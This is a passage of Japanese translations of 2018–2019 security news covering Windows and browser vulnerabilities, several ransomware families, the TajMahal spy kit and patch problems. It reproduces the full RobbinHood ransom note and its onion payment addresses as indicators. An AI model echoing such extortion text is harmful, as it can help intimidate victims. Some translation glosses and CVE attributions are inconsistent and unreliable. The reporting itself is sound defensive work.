 実際に、私がMicrosoftに対して償還請求をするのか? 間違いなく私一人ではない。仮想通貨ユーザは狙われている。

 Naked Securityの読者への結論は、あなたのオンラインアカウントを安全にするためには保護の複数の形態に頼ることがより適切であるということである。
 Ritmeesterは、パスワードマネージャに保管していた強力でユニークなパスワードを使用していたが、Krakenがサポートしている2ファクタ認証プロテクションを使用していなかった。これは彼の管理外にあるE-mailハックに自分を晒していた。彼は以下のように発言している:

 残念ながら、私はKraken.comで2ファクタ認証をしていなかった。私の口座はすべて、一意の長いパスワードでしっかり保護されていたからである。私は依然として、この行為は正しいと思っているが、今回のMicrosoftの漏洩は内部からのものである。適切なパスワードだったとはいうものの、2ファクタ認証が、あなたの口座を適切に保護する唯一の方法であるということは、高価ではあるが賢明な教訓である。

 特に仮想通貨のユーザへ、もう一つのの結論は、確実な財布とは対照的に仮想通貨の口座を長期間監視せずに資産を放置することは、攻撃に直面する可能性を増加させ、アカウントハックの影響を受けやすくなるということである。


Microsoft EdgeのファイルパーミッションはInternet Explorerと激しく衝突し、XXE攻撃を可能にする
BleepingComputer : News>Security (2019/04/17)
 Internet Explorerに影響を与え、未だにMicrosoftからの修正を受け取っていない最近明らかにされた脆弱性は、リモートの攻撃者がローカルファイルを密かに抽出しシステム上で偵察活動の実行可能性を拒否するマイクロパッチを受け取った。
 XML External Entity (XXE。【訳註】一般にWebアプリケーションでみられ、XXEによって攻撃者はネットワークに接続されたサーバー内の通常保護されているはずのファイルを取得することが可能となる(Wikipediaより))、このセキュリティフローは、セキュリティ研究者John Pageによって発見され、3月27日にMicrosoftに通知されている。彼は、彼の発見をサポートする概念の実証を含む詳細を4月10日に公開した。
 この研究者はまた、この脆弱性が攻撃される方法を示すビデオも公開している。

 この脆弱性攻撃は、Microsoft Edgeブラウザでダウンロードされた特別に細工されたMHTファイル(【訳註】単一のファイルに HTML や画像などのデータがまとめられたファイル(Microsoft Supportより))を、ユーザが開いた時に可能になる。この種のファイルはMHTML Webアーカイブであり、Internet Explorer(IE)がWebページを保存するために使用するDefaultのフォーマットである。IEはまた、Windowsオペレーティング・システムでこれらのファイルを開くDefaultのプログラムである。
 ACROS SecurityのMitja Kolsekは、この問題を解析し、この問題の源が、Webからダウンロードされるファイルに適用されているWeb(MOTW)フラグのマークを正しく読み取るIEの能力を妨害するEdge中の「マニュアル化されていないセキュリティ機能」に存在すると決定した。
 Microsoftが、この脆弱性用の修正をリリースするまで、このマイクロパッチは0Patchプラットフォームから利用可能である。このマイクロパッチは、Edgeが、ダウンロードファイル用に設定したWebフラグのマークを、Internet Explorerが正しく解釈できるようにするエラーチェックルーチンを適用する。

セキュリティ機能間のコンフリクト

 MOTWは、IEが、ローカルスクリプトやアクティブコンテンツを特権を昇格させて実行する前に、パーミッションを要求するセキュリティ機能である。
 「つまり、ページ内のMOTWでは、インターネットゾーンからのコンテンツと同じようにコンテンツを実行できる。したがって、スクリプトとアクティブコンテンツには、Webサイトから表示している場合と同じ権限が与えられる。そして、スクリプトとアクティブコンテンツは、マシンのリソースに対して昇格されたアクセスで実行することはできない」のようにMicrosoftの説明は読める。
 Kolsekは、IEでダウンロードされたMHTファイルのパーミッションとEdgeで取得されたMHTファイルのパーミッションに相違のあることを発見した。後者はアクセス・コントロール・リスト(ACL)に以下の二つのエントリを追加している。

・ S-1-15-3-3624051433-2125758914-1423191267-1740899205-1073925389-3782572162-737981194:(OI)(CI)(R)
・ S-1-15-2-3624051433-2125758914-1423191267-1740899205-1073925389-3782572162-737981194:(OI)(CI)(R)

 二つ目のエントリは、IEの低整合性プロセスがファイルのコンテンツもしくは属性への読み込みアクセスを拒否するものである。「我々は、Edgeが、その低整合性サンドボックスでの悪意あるコードの実行に対して、保存されているファイルのセキュリティを更に確固たるものにするためにこの機能を使用していると考えている」とKolsekは発言している。
 MOTW情報はまた、このデータストリーム中に格納されているので、IEがそれを読み込もうとした時にエラーに遭遇することは明らかである。このブラウザは、このエラーを無視し、その結果として、このファイルは、MOTWフラグを持っていなかった場合と同じように処理される(通常のローカルファイルと同様にユーザがそれを起動した時、同じ特権の恩恵を受ける)。
 Pageによって発見されたこのXXE脆弱性は、Edgeユーザだけを危険に晒し、人気のある他のブラウザやE-mailクライアントでは、悪用を可能にするこのマニュアル化されていない機能を発見できなかったと、Kolsekは発言している。


パッチされたWindowsの0-Dayは、脆弱性のあるシステムの完全なコントロールを提供していた
BleepingComputer : News>Security (2019/04/15)
 Microsoftが2019年4月に73の他のフローの一部としてパッチしたWindows 0−Dayの脆弱性は、攻撃者が脆弱性のあるシステムの完全なコントロールを奪える可能性があった。
 この0−Dayは、パッチする前から積極的に攻撃されていた。この攻撃は、Kaspersky Labの研究者Vasiliy BerdnikovとBoris Larinによって、"Windows 7からWindows 10の古いバージョンまで"の複数のWindowsの64bitバージョンをターゲットにしてオンライン上でこの脆弱性が積極的に攻撃されていたことが発見されていた。

5つの特権の昇格フローの一つ

 これは、Kaspersky Labの研究者達が最近発見した初めてのローカルにおける特権の昇格フローではない。以下が、Microsoftによってここ数ヶ月間にパッチされたローカルの特権の昇格フローである。

 CVE-2019-0859として追跡されるUse-After-Free(メモリ解放後使用)の脆弱性は、win32k.sysカーネルモードドライバ中に存在し、「コンポーネントがメモリ中のオブジェクトを正しく処理できない」という事実に由来する。
 「この脆弱性攻撃に成功した攻撃者は、カーネルモードで任意のコードを実行できる。次に、攻撃者は、データの閲覧、変更、あるいは削除するためのプログラムをインストールしたり、完全なユーザ権限で新しいアカウントを作成できる」と、Microsoftアドバイザリは述べている。
 また、「この脆弱性を攻撃するには、攻撃者は最初にシステムにログオンする必要がある。攻撃者は次に、この脆弱性を攻撃し、影響を受けたシステムの完全なコントロールを取得することのできる特別に細工されたアプリケーションを稼働することができる」とも述べている。
 Kasperskyの研究者によって更に発掘されたこととして、この脆弱性は、犠牲者のシステムへの完全なコントロールを攻撃者が取得するための第三段階のPowerShellベースの脆弱性攻撃手順の一部として「HTTP reverse shell(【訳註】HTTPリダイレクト)を実行する」(バックドアとして知られる)ために、threat actor(【訳註】脅威の動作主体。以下、アクター)によって使用されていた。


最終段階のPowerShellスクリプト(画像をクリックすると拡大します))

バックドアは攻撃者が完全な制御を奪うために埋め込まれる

 Symantecの2019 Internet Security Threat Reportで詳らかにされているように、悪意あるアクターの全体的な傾向がliving-of-the-land(環境寄生【訳註】痕跡を残さないためにマルウェアを利用しない攻撃。資格情報を盗むかハッキングすることで、既存の管理ツールやシステムを利用する攻撃(ScanNetSecurityより))テクニックに移行するに従って、PowerShellスクリプトの悪意ある使用が、顕著な増大を見せている(前年比1000%)。
 PowerShellスクリプトを使用したこのWindows 0−Dayの積極的攻撃は、悪意あるアクターが彼らの悪意あるツールやドロッパー スクリプトを実行するために万能のPowerShellのような直ぐに利用可能なツールを実際に採用していることを示している。
 この脆弱性は、先週Microsofstによってパッチされた唯一の脆弱性ではなく、Alibaba Cloud Intelligence Security TeamのDonghai Zhuによってレポートされた後に修正された他の特権の昇格の脆弱性が、Win32kコンポーネント(CVE-2019-0803として追跡される)中に存在していた。
 Zhuによって発見されたCVE-2019-0859フローはまた、オンライン上で攻撃されていた、そして、悪意あるアクターは影響を受けたシステムの完全な制御を奪うことが可能になっていた。


RobbinHood身代金要求型マルウェアは、あなたのプライバシーを保護すると主張している
BleepingComputer : News>Security (2019/04/13)
 ネットワーク全体をターゲットにし、アクセスを取得できる全てのコンピュータを暗号化するRobbinHoodと名乗る新しい身代金要求型マルウェアが登場している。このマルウェアは、単一のコンピュータを復号するために特定の量のBitcoinを、あるいはネットワーク全体を復号するために多量のBitcoinを要求する。
 このマルウェアに関しては、現在殆ど知られておらず、RobbinHoodのサンプルも未だ発見されてはいない。けれども、我々は、脅迫文と様々な犠牲者の暗号化されたファイルを確認した。これは、我々に、この身代金要求型マルウェアが機能している方法を割り出すことを可能にした。
 取分け興味のあることは、彼らにとって犠牲者のプライバシーが重要であるということに重きを置き、支払いをした犠牲者を全く公開していないことにある。

RobbinHoodはネットワークをターゲットにしている

 脅迫文に基づくと、RobbinHoodを操っている攻撃者は、ネットワークへのアクセスの取得を積極的に試みている。彼らがアクセスを取得すると、そのネットワーク上の可能な限りのコンピュータを暗号化しようとする。
 使用されている暗号化の方法に関しては何も分かっていないが、暗号化されるたファイルが、Encrypted_b0a6c73e3e434b63.enc_robbinhood に類似した名前に変更されることは分かっている。
 この身代金要求型マルウェアは、不思議なことに同時に4つの異なった名前で脅迫文を投下する。これらの脅迫文の名前は、_Decryption_ReadMe.html, _Decrypt_Files.html, _Help_Help_Help.html, _Help_Important.htmlである。


RobbinHoodの脅迫文(脅迫文全文を見る

 この脅迫文には、犠牲者のファイルに発生したことに関する情報(身代金の額、ユーザが攻撃者にメッセージを残したり、サイズで10MBまでの3つのファイルを無料で復号することのできるTORサイトへのリンク)が含まれている。
 現在、脅迫文中で使用されているアドレス:

http://xbt4titax4pzza6w.onion/
https://xbt4titax4pzza6w.onion.pet/
https://xbt4titax4pzza6w.onion.to/

 これらの脅迫文は、犠牲者が単一のコンピュータを復号したいのか、ネットワーク全体を復号したいのかに応じて異なる支払金額を表示している。例えば、BleepingComputerによって確認された脅迫文中には、身代金額は、コンピュータ一台あたり3 Bitcoin、ネットワークに関しては7 Bitcoinとなっている。
 また、この脅迫文は、感染4日目以降、一日あたり 10,000$ 増加するとも述べている。

RobbinHoodは、あなたのプライバシーを気にかけている

 この身代金要求型マルウェアのTOR支払いページで、RobbinHoodの開発者は、犠牲者のプライバシーを心配し、支払った後には、その暗号化キーとIPアドレスは削除されると述べている。

 「私が言及したいことは、我々にとってあなたのプライバシーは重要であり、IPアドレスと暗号化キーを含むあなたの記録の全ては、支払いが済み次第削除されるということである。また、あなたが支払うべきBitcoinアドレスは、一意のものであり、それを知る者は誰もいないということである。」


RobbinHoodのTOR支払いサイト)

 更に興味深いのは、この攻撃者達が、彼らの秘密を守るために、このセキュリティ侵害を報告する必要はないと犠牲者に告げていることである。

 「我々のサーバが、あなたのネットワークと情報に関するイベントを些かも持っていないことを言及する必要はない。」

 これは、私が身代金要求型マルウェアがチョットしたアドバイスを提供しているのを確認した最初の出来事である。犠牲者が身代金要求型マルウェアに感染したことを秘密に保持すると述べることによって、彼らは、犠牲になった企業に対して、このセキュリティ侵害を公開されることなく身代金を支払うことができ、悪評を受け取らなくて済むということを仄めかしている。
 これは、身代金の支払い可能性を増やすために実行されている。

Greenville市が、RobbinHoodに攻撃されていた

 RobbinHoodは、ノースカロライナ州グリーンビル市のネットワークに感染することで既にニュースになっている。


グリーンビル市のTweet

 ノースカロライナ州のNews Channel 12によると、この市は水曜日にRobbinHood身代金要求型マルウェアによって攻撃され、被害の範囲を確定する間ネットワークをシャットダウンした。
 彼らは、複数の調査機関とこの攻撃を調査すると共に、法執行機関にもコンタクトした。
 「FBIの調査官は現在、このセキュリティ侵害を処理する方法の決定に関与している。National Guard, Strike Team, State IT及びState Emergency Managementも、この件で作業中である。」
 不幸にして、グリーンビルがRobbinHood身代金要求型マルウェアによる唯一の犠牲者ということではない。
 BleepingComputerと、昨日この身代金要求型マルウェアについてTweetしたMalwareHunterTeamは、RobbinHoodに感染した犠牲者をモニターしている。MalwareHunterTeamは、この時点で犠牲者の何れも身代金を支払っていないと述べている。

IOC

関連ファイル名
    _Decryption_ReadMe.html
    _Decrypt_Files.html
    _Help_Help_Help.html
    _Help_Important.html

脅迫文
    What happened to your files?
    All your files are encrypted with RSA-4096, Read more on https://en.wikipedia.org/wiki/RSA_(cryptosystem)
    RSA is an algorithm used by modern computers to encrypt and decrypt the data. RSA is an asymmetric cryptographic algorithm. Asymmetric means that there are two different keys. This is also called public key cryptography, because one of the keys can be given to anyone:

    1 - We encrypted your files with our "Public key"
    2 - You can decrypt, the encrypted files with specific "Private key" and your private key is in our hands ( It's not possible to recover your files without our private key )

    Is it possible to get back your data?
    Yes, We have a decrypter with all your private keys. We have two options to get all your data back. Follow the instructions to get all your data back:

    OPTION 1
    Step 1 : You must send us 3 Bitcoin(s) for each affected system
    Step 2 : Inform us in panel with hostname(s) of the system you want, wait for confirmation and get your decrypter
    OPTION 2
    Step 1 : You must send us 7 Bitcoin(s) for all affected system
    Step 2 : Inform us in panel, wait for confirmation and get all your decrypters

    Our Bitcoin address is: xxxxxxxxxxx

    BE CAREFUL, THE COST OF YOUR PAYMENT INCREASES $10,000 EACH DAY AFTER THE FOURTH DAY

    Access to the panel ( Contact us )
    The panel address: http://xbt4titax4pzza6w.onion/xxxx/

    Alternative addresses
    https://xbt4titax4pzza6w.onion.pet/xxxx/
    https://xbt4titax4pzza6w.onion.to/xxxx/
    Access to the panel using Tor Browser
    If non of our links are accessible you can try tor browser to get in touch with us:
    Step 1: Download Tor Browser from here: https://www.torproject.org/download/download.html.en
    Step 2: Run Tor Browser and wait to connect
    Step 3: Visit our website at: panel address

    If you're having a problem with using Tor Browser, Ask Google: how to use tor browser
    Wants to make sure we have your decrypter?
    To make sure we have your decrypter you can upload at most 3 files (maximum size allowance is 10 MB in total) and get your data back as a demo.
    Where to buy Bitcoin?
    The easiest way is LocalBitcoins, but you can find more websites to buy bitcoin using Google Search: buy bitcoin online


Microsoftの2019年4月の定例パッチはWindowsにフリーズを発生させる
BleepingComputer : News>Security (2019/04/11)
 Microsoftの最新の2019年4月の定例アップデートとアンチウィルス間のコンフリクトは、Windows 7, Windows 8.1, Windows Server 2012, Windows Server 2012 R2でフリーズ(起動することが不可能、あるいは、アップデートのインストールをハングさせる)を発生させている。
 Microsoft, Avast, Avira, Sophosのサポート記事によると、最新のアップデートの一部とSophos Endpoint Protection、AvastのBusinessやCloudCareのようなアンチウィルスソフトウェアとの間でコンフリクトが発生している。

  • ・ Sophos Central Endpoint and SEC: Computers fail/hang on boot after the Microsoft Windows April 9, 2019 update(リンクは日本語サイトに変更しています)
    ・ Windows Machines Running Avast for Business and CloudCare Freezing on Start-up
    ・ Why does my system run very slow? (From Avira)(リンクは日本語サイトに変更していますが、日本時間、4/12 09:22現在和訳はされていません)
  •  Sophosはサポート記事で、このアップデートがWindowsに起動の失敗を発生させていると述べている。ユーザからのレポートでは、このアップデートプロセスが、Windowsアップデートの構成段階でハングすることも示している。

     「以下のMicrosoft Windowsアップデートをインストールした後、Sophosは、コンピュータが起動できないとするレポートを受け取った。Sophosはこの問題を積極的に調査しており、詳細な情報が利用できるようになり次第、この記事をアップデートする。」

     Sophosは以下のアップデートがコンフリクトを起こすとレポートしている。

  • ・ April 9, 2019 - KB4493467 (Security-only update) - Windows 8.1, Windows Server 2012 R2
    ・ April 9, 2019 - KB4493446 (Monthly Rollup) - Windows 8.1, Windows Server 2012 R2
    ・ April 9, 2019 - KB4493448 (Security-only update) - Windows 7 Service Pack 1, Windows Server 2008 R2 Service Pack 1
    ・ April 9, 2019 - KB4493472 (Monthly Rollup) - Windows 7 Service Pack 1, Windows Server 2008 R2 Service Pack 1
    ・ April 9, 2019 - KB4493450 (Security-only update) - Windows Server 2012, Windows Embedded 8 Standard
    ・ April 9, 2019 - KB4493451 (Monthly Rollup) - Windows Server 2012, Windows Embedded 8 Standard
  • Avastは、KB4493472, KB4493448, 並びに、KB4493435 が問題を発生させると指摘している。KB4493435は、Internet Extlorer用の累積セキュリティアップデートである。
     最後に、Aviraは、Windows 10用のKB4493509、Windows 7用のKB4493472, KB4493448が、Windowsの挙動を通常より緩慢にすると述べている。

     「我々は説明された挙動を再現することができた。これは、今回のWindowsアップデートによって発生している。」

     Microsoftは、この問題を認識しており、影響を与えているアップデートについて、以下の既知の問題をナレッジベースに追加している。更なる問題を防ぐために、Microsoftは、コンフリクトを発生させているアップデートをブロックしたので、解決策が利用可能になるまで、それらはSophos Endpointを稼働しているユーザには提供されない。

    概要

    解決策

    MicrosoftとSophosは、Sophos CentralまたはSophos Enterprise Console(SEC)の何れかをインストールし管理しているSophos Endpoint Protectionを搭載したデバイスで、このアップデートのインストール後の再起動時にシステムがフリーズまたはハングする原因となる問題を発見した。 Microsoftは、Sophos Endpointがインストールされている場合、解決策が利用可能になるまで、そのデバイスに対するこのアップデートの配信を一時的にブロックしている。詳細情報に関しては、Sophosのサポート記事を参照。

     現時点で、MicrosoftがAvastやAvira製品とのコンフリクトに言及しておらず、このアップデートが、これらアンチウィルスユーザにも同様にブロックされるか否か不明であることに注意すべきである。

    フリーズと無限再起動の解決方法

     2019年4月の定例アップデートをインストールした後、Windowsが起動に失敗したり、フリーズしたり、アップデートの構成で立ち往生した場合、Windowsが適切に動作するように、このアップデートを削除する必要がある。
     Sophosは、影響を受けたコンピュータからこのアップデートを削除するために以下のステップを推奨している:

  • ・ セーフモードで起動。
    ・ Sophos Anti-Virus サービスの "スタートアップの種類" を無効に設定する。
    ・ 通常モードで起動。
    ・ 該当する Windows KB をアンインストール。
    ・ Sophos Anti-Virus サービスの "スタートアップの種類" を自動に設定する。
    ・ タンパープロテクションを有効に設定している場合は、サービスを再度有効にするためにはタンパープロテクションを無効に設定する必要がある。
  •  Avastは、コンピュータをセーフモードでブートし、KB4493472, KB4493448, KB4493435をアンインストールすることを推奨している。

    Windows 10も影響を受ける

     Borncity.comのGunter Born(uはuにウムラウト)もまた、Windows 10も同様に影響を受けるとするレポートが存在すると述べている。
     Bornによると、SophosがインストールされているWindows 10ユーザから同様の問題が発生したとする報告を受けている。影響を受けたユーザに関して、彼は、以下のアップデートをアンインストールするように推奨している。

  • ・ Windows 10 1709: KB4493441
    ・ Windows 10 1803: KB4493464
    ・ Windows 10 1809: KB4493509
    ・ Windows 10 1903: KB4495666

  • 新しいTajMahalサイバースパイ・キットは、80の悪意あるモジュールを含んでいる
    BleepingComputer : News>Security (2019/04/10)
     TajMahal(凡そ80の様々な悪意あるモジュールを呼び物にし、2013年後半以来アクティブである今まで未知のプラットフォーム)が、2018年末にKaspersky Labの研究チームによって発見された。
     「最も早期のサンプルは2013年4月の日付であり、最新のサンプルは2018年8月である」ことから、このサイバースパイ・キットは6年間アクティブだったが、このAPT(Advanced Persistent Threat。【訳註】高度標的型攻撃と呼ばれ、マルウェアによってターゲット企業へ侵入し、C&Cサーバーとの通信を行いながら、内部ネットワーク上に長期間潜伏して調査活動、管理者権限の取得などを行い、結果として、機密情報を盗むための一連の攻撃活動を指す(サイバーセキュリティ インデックスより))フレームワークは、未だ如何なるハッキンググループとも関連付けられていない。
     Kaspersky Labによる更なる発見として、TajMahalは、二つの悪意あるパッケージ(それぞれ、Tokyo、Yokohamaと名付けられている)を搭載し、ターゲットのコンピュータに一つを投下した後、他を投下する多段階攻撃型フレームワークである。
     感染の第一段階で配備される小さい方のTokyoパッケージは、バックドア機能を搭載している。そして、十分な機能を有するYokohamaスパイパッケージを投下するために使用される。Yokohamaは、「ローダー、オーケストレーター、コマンド&コントロール・コミュニケーター、オーディオレコーダー、キーロガー、スクリーンとWebカメラ・グラバー、ドキュメントと暗号化キースティラーを含む凡そ80のモジュール」を搭載している。


    TajMahal APTフレームワーク(画像をクリックすると拡大します)

     研究者がオンライン上でTajMahalフレームワークを発見した全てのシステムは、TokyoとYokohamaの両方に感染していた。これは、TokyoとYokohamaの両方が感染したコンピュータで機能し続けていることを示唆している。「Tokyoは、関心のある犠牲者に十分な機能を有するYokohamaパッケージを配備するための感染の第一段階で使用され、バックアップ目的のために残されている」と推測されている。
     Yokohamaが犠牲者のコンピュータに投下されると、関心のあるドキュメントやメディアファイルを捕え、クッキーとバックアップを盗み、プリンタのキュー、焼かれたCD、USBストレージデバイスからファイルをクスねるために使用される。
     全ての収集されたデータは、このAPTフレームワークの背後にいるハッキンググループによって制御されているコマンド&コントロールサーバに対して、TajMahalと名付けられたXMLファイル形式で一斉に送信される。
     この攻撃は2014年に行われているので、このフレームワークは少なくとも5年間使用されているにも拘わらず、研究者によって確認されたTajMahalの犠牲者が中央アジアの外交機関だけであるため、Kaspersky Labは、このスパイプラットフォームを使用して感染させられた他のコンピュータシステムが存在していると考えている。
     TajMahalフレームワークを検証している間に、Kaspersky Labの研究者によって発見された能力の一部は以下である:

      ・ プリンタのキューに送信されたドキュメントを盗む能力
      ・ Appleモバイルデバイスのバックアップリストを含む犠牲者を偵察するためのデータ収集
      ・ VoiceIPとオーディオをレコーディングしている時にスクリーンショットを取得する
      ・ 書き込まれたCDイメージを盗む
      ・ 今迄にリムーバルデバイス上で確認したファイルが再び利用可能になると、このファイルを盗む能力
      ・ Internet Explorer, Netscape Navigator, FireFox, RealNetworksのクッキーを盗む
      ・ フロントエンドファイルや、関連付けられているレジストリ値が削除されると、再起動後に、新しい名前とスタートアップのタイプで再び現れる

     Kaspersky Labの主任マルウェア アナリストAlexey Shulminは、「このTajMahalフレームワークは大変関心のある興味をそそるものである。技術的に洗練されていることには疑いの余地がなく、この高度な脅威の動作主体は、我々がこれまで見たことのない機能を特徴としている。 多くの質問が残っている。例えば、このような巨大な投資が、一人の被害者だけに企てられたというのは、ありえないことだろう」と、発言している。
     また、「これは、未だ特定されていない他の被害者がいるのか、オンライン上にこのマルウェアの別のバージョンが存在するのか、あるいはその両方なのかを示唆している。この脅威の分布と感染ベクトルも未知のままである。どういうわけか、これは5年間もレーダーに探知されなかった。これが相対的に活動が穏やかだったためなのか、それとも他の要因なのかは、別の興味をそそる問題である。既知の脅威グループに起因すると考えられる手がかりも、既知の脅威グループを見つけることのできる如何なるリンクも存在していない。」


    Mira身代金要求型マルウェア復号プログラム
    F-Secure : News From The LAB (2019/04/01)
     我々は、暗号化されたファイルを復号する可能性をチェックするためにMira(Trojan:W32/Ransomware.AN)と呼ばれる最近の身代金要求型マルウェアを調査した。
     殆どの場合、復号は、復号に必要なキーが欠落しているために非常に困難である。しかしながら、Mira身代金要求型マルウェアの場合、暗号化されたファイルに要求される全ての情報を暗号化したファイルそれ自体に追加していた。

    暗号化プロセス

     この身代金要求型マルウェアは、キーを生成するためにRfc2898DeriveBytesクラスの新しいインスタンスを初期化する。このクラスは、パスワード、ソルト(【訳註】パスワードを暗号化する際に付与されるデータのこと(日立ソリューションズ・セキュリティ用語解説より))、反復回数を取得する。


     このパスワードは以下の情報を使用して生成される。

      ・ マシンの名前
      ・ OSのバージョン
      ・ プロセッサの番号


     他方、ソルトは乱数生成器(RNG)によって生成される。


     次に、この身代金要求型マルウェアは、ファイルを暗号化するためにRijndaelアルゴリズムの使用を開始する。


     暗号化の後、この身代金要求型マルウェアは、ファイルの末尾に'header'構造体を追加する。


     好都合なことに、このヘッダーは、ソルトとパスワードハッシュを含んでいた。それに加えて。反復回数が、このサンプル中にハードコードされていた(このケースでは、この値は20であった)。
     この身代金要求型マルウェア自体から、このパスワード、ソルト、反復回数を取得することで、我々は、このマルウェアによって暗号化されたファイル用の復号ツールを作成するために必要な全ての情報を取得することができた。

    復号ツール

     復号ツールは、ここからダウンロードすることができる。
     ツールの使い方は、こちらのビデオを参照されたい。


    vxCrypter: 重複ファイルを削除する最初の身代金要求型マルウェア
    BleepingComputer : News>Security (2019/04/01)

     vxCrypter身代金要求型マルウェアは、犠牲者のデータを暗号化するだけでなく、重複ファイルを削除することによって犠牲者のコンピュータを綺麗に片付ける最初のマルウェア感染である。
     先週、私は、vxCrypterと呼ばれる新しい身代金要求型マルウェアを発見した。このマルウェアは現段階では開発中である。これは、.NET身代金要求型マルウェアであり、vxLockと呼ばれ完成しなかった古い身代金要求型マルウェアに基づいている。


     私がこの身代金要求型マルウェアを最初にテストした時、以下の画像に示したように、一つを除いてフォルダ中の全てのファイルが削除されていることに気がついた。私は、この身代金要求型マルウェアが未だ開発段階であると認識していたので、暗号化のルーティン中のバグだと思った。


     週末の間、Michael Gillespieは、このランサムウェアが重複したファイルを削除しているので、このファイルの削除は意図的なものであると私に告げた。これは、Gillespieや私が、このような挙動を確認した最初の身代金要求型マルウェアである。
     この身代金要求型マルウェアの解析中に、Gillespieは、この身代金要求型マルウェアが、暗号化した各ファイルのSHA256ハッシュを追跡し続けていることに気付いた。この身代金要求型マルウェアが他のファイルを暗号化している時、同じSHA256ハッシュに遭遇すると、そのファイルを復号するのではなく削除する。


    SHA256に基づく削除を示すソースコード

     この身代金要求型マルウェアは、暗号化のターゲットにしている以下のファイル拡張子の重複ファイルだけを削除する。

    .txt, .doc, .docx, .xls, .xlsx, .ppt, .pptx, .sqlite, .odt, .jpg, .jpeg, .bmp, .gif, .png, .csv,
    .sql, .mdb, .sln, .php, .asp, .aspx, .html, .xml, .psd, .xsd, .cpp, .c, .h, .hpp, .htm, .py,
    .reg, .rb, .pl, .zip, .rar, .tgz, .key, .jsp, .db, .sqlite3, .sqlitedb, .bat, .bak,
    .7z, .avi, .fla, .flv, .java, .mpeg, .pem, .wmv, .tar, .tgz, .tiff, .tif

     .exe や .dll のような他のフィルに関しては、重複ファイルは残されたままである。
     考えられることとして、この身代金要求型マルウェアが、コンピュータの暗号化をスピードアップする以外、これを実行している理由は判明していない。また、攻撃者がパフォーマンスの向上、大惨事の発生、あるいは、明白な理由のなき行動のために、このマルウェアを進化させ続けていることは、我々が警戒を怠らないようにする必要のあることも示している。


    Adobe ReaderとAcrobatの緊急のセキュリティアップデートがリリースされた
    BleepingComputer : News>Security (2018/09/19)
     先週、Adobeは2018年9月の月例アップデートで6つの緊急のアップデートの修正をリリースした。彼らは一つパッチし損なっていたようである。そこで、Adobeは、今日Adobe AcrobatとAdobe Reader中の緊急の脆弱性を修正するための定例外アップデートをリリースした。
     APSB18-34セキュリティブレティンで、このアップデートがコード実行を導くことのできる境界外書き込みの脆弱性をどのように解決するのかを詳細に説明している。他の6つは、情報の漏洩に導く境界外読み取りの脆弱性である。

                                
    脆弱性のカテゴリ 脆弱性のインパクト 深刻度 CVE番号
    境界外書き込み任意のコードの実行緊急CVE-2018-12848
    境界外の読み取り情報漏洩重要CVE-2018-12849、CVE-2018-12850
    CVE-2018-12801、CVE-2018-12840
    CVE-2018-12778、CVE-2018-12775

     コード実行の脆弱性(CVE-2018-12848)は、Check Point SoftwareによってAdobeに通知された。この情報漏洩の脆弱性は、Check Point Software、Cybellum Technologies LTD、Trend MicroのZero Day Initiativeを介して公開された。
     この脆弱性を修正するには、ユーザは、Acrobat DCとAcrobat Reader DCでは、バージョン2018.011.20063に、Acrobat 2017とDC 2017では、バージョン2017.011.30102に、Acrobat DC Classic 2015とAcrobat Reader DC Classicでは、バージョン015 2015.006.30452にアップグレードする必要がある。アップグレードのリンクは、ここで見つけることができる。


    CCleanerは設定を無視し、最新バージョン5.46へのアップデートを強制している
    BleepingComputer : News>Security (2018/09/17)
     ユーザが自動アップデートを実行しないように設定していた場合でさえ、Piriformは、CCleanerの最新バージョン5.46へのアップデートを強制しているとするレポートが出現している。更に悪いことには、ユーザがこの最新バージョンにアップグレードすると、そのユーザのプライバシー設定はDefaultに戻される。これは、匿名利用データをAvast/Piriformに送信することを許可することである。
     これが最初に報告されたのは、9月6日Piriformのフォーラムでのことである。ここで、ユーザ達は、自動アップデートを無効化していた場合でさえ、CCleanerのインストールされているバージョンが、5.46にアップデートされていたと述べている。これは後に、我々のフォーラムへの投稿で確証された。


    BleepingComputer.comへの投稿

     同じPiriformのトピックに於いて、担当者は、「v5.46のリリース以来、我々は、法的要件を満たすためにユーザをこのバージョンにアップデートし、彼らのプライバシー設定により多くの自立性と透明性を提供している」と、その回答で述べている。


    Piriformフォーラムへの担当者からの投稿

     実験的に、私はBleepingComputer.comでホストしているCCleaner 5.37のSlimバージョンをダウンロードしインストールした。
     設定手順の間に、私は新しいアップデートに関し自動アップデートしないように、このプログラムを設定した。自動アップデートの設定を無効化しているにも拘わらず、CCupdate.exeは、私がこのプログラムを起動する前にバージョン5.46へのアップデートを、このインストーラによって自動的に実行した。これを以下のビデオで示す。

     これは明らかに、CCleanerがユーザ設定を無視し、新しいバージョンのアップデートを強制しているということが懸念されている。
     自動アップデートプロセスに関する疑問を投げかけたとき、Avastスポークスマンは、以下の声明で対応した。

     「我々は、CCleanerバージョン5.36に重要なアップデート機能を導入した。この重要なアップデートは、セキュリティ上の脅威に対して我々のユーザを保護するために、データの損失や深刻なソフトウェア/ハードウェアのコンフリクトのようなシナリオを回避する目的で重要なソフトウェアアップデートを提供するために設計された。これはCCleaner Professionalが、外すことのできる自動アップデートとは異なっている(自動アップデート機能は、現在CCleaner Free版には搭載されていない)
     我々が定めた幾つかの理由により、バージョン5.46は、以下の重要なアップデートの最低基準を満たしたアップデートを含んでいる。
     ユーザが、Windows上で重要な問題を発生させることのないバージョンを利用していることを保証する。バージョン5.46は、Chromeでの個人設定の損失と、Windows Update後のグラフィックドライバ損壊の可能性を防ぐために、重要な安定性の問題を解決している。
     これは、ユーザのプライバシー設定に於いて望みうる最高のコントロールをユーザに提供するものである。バージョン5.46は、ユーザに更なるプライバシー設定を提供しており、我々のData Factsheetへのリンクを含んでいるため、CCleanerが報告できるデータとその理由に関して完全な透明性を提供する。我々は、v5.45で実行された変更に関してユーザのフィードバックを聞いた後、これが重要であると感じた。
     これは、アップデートされたユーザをGDPR(【訳註】 EUの一般データ保護規制)準拠バージョンに移行させる更なる利点を持っている(我々は、GDPRの導入時点でCCleanerの準拠したバージョンをリリースしているが、全ての人をこのバージョンにアップデートさせる義務を負っていなかった)。
     あなたの最後の質問に関する回答だが、このアップデートの間、プライバシー設定はDefaultには復元されない。ここ数カ月間に渡り、GDPRの要件に起因し、そして、ユーザフィードバックの結果として、プライバシー関連要件は変更された。結果として、利用可能なオプションは現在の法律とユーザの必要性を反映するようにアップデートされた。
     ユーザーの経験を念頭に置いて、重要なアップデートを構成するものと、それを発行する時期を判断している。 我々は、できるだけ多くのユーザが、最も明確なプライバシー設定を持つ安定且つ準拠したバージョンを利用することを望む。我々は、 ユーザーを混乱させたことを心からお詫びする。」

    CCleanerの自動アップデートを無効化する方法

